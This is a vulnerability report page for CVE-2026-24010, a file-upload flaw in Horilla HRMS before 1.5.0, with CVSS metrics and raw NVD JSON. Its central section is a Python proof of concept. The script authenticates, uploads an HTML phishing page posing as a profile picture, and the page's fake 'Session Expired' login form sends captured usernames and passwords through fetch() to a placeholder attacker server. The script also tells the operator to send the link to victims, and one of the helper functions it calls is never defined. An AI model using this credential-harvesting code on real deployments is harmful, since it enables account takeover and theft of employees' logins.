Security Vulnerability Report
中文
CVE-2026-24010 CVSS 8.0 HIGH

CVE-2026-24010

Published: 2026-01-22 03:15:48
Last Modified: 2026-01-29 20:00:49
Source: [email protected]

Description

Horilla is a free and open source Human Resource Management System (HRMS). A critical File Upload vulnerability in versions prior to 1.5.0, with Social Engineering, allows authenticated users to deploy phishing attacks. By uploading a malicious HTML file disguised as a profile picture, an attacker can create a convincing login page replica that steals user credentials. When a victim visits the uploaded file URL, they see an authentic-looking "Session Expired" message prompting them to re-authenticate. All entered credentials are captured and sent to the attacker's server, enabling Account Takeover. Version 1.5.0 patches the issue.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:horilla:horilla:*:*:*:*:*:*:*:* - VULNERABLE
Horilla HRMS < 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-24010 PoC - Horilla HRMS File Upload Phishing Attack # Target: Horilla HRMS < 1.5.0 TARGET_URL = "http://target-horilla-server.com" ATTACKER_SERVER = "http://attacker-controlled-server.com" # Malicious HTML payload disguised as profile picture PHISHING_HTML = ''' <!DOCTYPE html> <html> <head> <title>Session Expired - Horilla HRMS</title> <style> body { font-family: Arial, sans-serif; background: #f0f2f5; } .login-box { width: 350px; margin: 100px auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); } h2 { text-align: center; color: #333; } input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 4px; box-sizing: border-box; } button { width: 100%; padding: 10px; background: #1877f2; color: white; border: none; border-radius: 4px; cursor: pointer; } button:hover { background: #166fe5; } .warning { text-align: center; color: #666; font-size: 14px; margin-bottom: 20px; } </style> </head> <body> <div class="login-box"> <h2>Horilla HRMS</h2> <p class="warning">Your session has expired. Please login again.</p> <form id="phishForm"> <input type="text" name="username" placeholder="Username" required> <input type="password" name="password" placeholder="Password" required> <button type="submit">Login</button> </form> </div> <script> document.getElementById('phishForm').addEventListener('submit', function(e) { e.preventDefault(); var formData = new FormData(this); fetch('ATTACKER_SERVER/log.php?cve=2026-24010', { method: 'POST', body: formData }).then(() => { // Redirect to legitimate login page after capturing credentials window.location.href = 'TARGET_URL/auth/login/?next=/'; }); }); </script> </body> </html> ''' def exploit(): # Step 1: Authenticate with valid credentials session = requests.Session() login_url = f"{TARGET_URL}/auth/login/" login_data = {'username': 'attacker_account', 'password': 'attacker_password'} response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Upload malicious HTML file as profile picture upload_url = f"{TARGET_URL}/employee/profile/update/" files = {'profile_picture': ('session_expired.html', PHISHING_HTML, 'text/html')} response = session.post(upload_url, files=files) if response.status_code == 200: # Extract uploaded file URL from response # Pattern: /media/avatar/ print("[+] Malicious file uploaded successfully") phishing_url = extract_uploaded_url(response) print(f"[+] Phishing URL: {phishing_url}") print(f"[+] Send this URL to victims to capture credentials") return True else: print("[-] File upload failed") return False if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24010", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:48.090", "lastModified": "2026-01-29T20:00:49.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Horilla is a free and open source Human Resource Management System (HRMS). A critical File Upload vulnerability in versions prior to 1.5.0, with Social Engineering, allows authenticated users to deploy phishing attacks. By uploading a malicious HTML file disguised as a profile picture, an attacker can create a convincing login page replica that steals user credentials. When a victim visits the uploaded file URL, they see an authentic-looking \"Session Expired\" message prompting them to re-authenticate. All entered credentials are captured and sent to the attacker's server, enabling Account Takeover. Version 1.5.0 patches the issue."}, {"lang": "es", "value": "Horilla es un Sistema de Gestión de Recursos Humanos (HRMS) de código abierto y gratuito. Una vulnerabilidad crítica de carga de archivos en versiones anteriores a la 1.5.0, con ingeniería social, permite a usuarios autenticados desplegar ataques de phishing. Al cargar un archivo HTML malicioso disfrazado como una imagen de perfil, un atacante puede crear una réplica convincente de página de inicio de sesión que roba credenciales de usuario. Cuando una víctima visita la URL del archivo cargado, ve un mensaje de 'Sesión Expirada' de aspecto auténtico que les solicita volver a autenticarse. Todas las credenciales introducidas son capturadas y enviadas al servidor del atacante, lo que permite la toma de control de cuentas. La versión 1.5.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-474"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:horilla:horilla:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "57934F7E-B93F-40A5-9E9A-CB97D7568936"}]}]}], "references": [{"url": "https://github.com/horilla-opensource/horilla/releases/tag/1.5.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/horilla-opensource/horilla/security/advisories/GHSA-5jfv-gw8w-49h3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.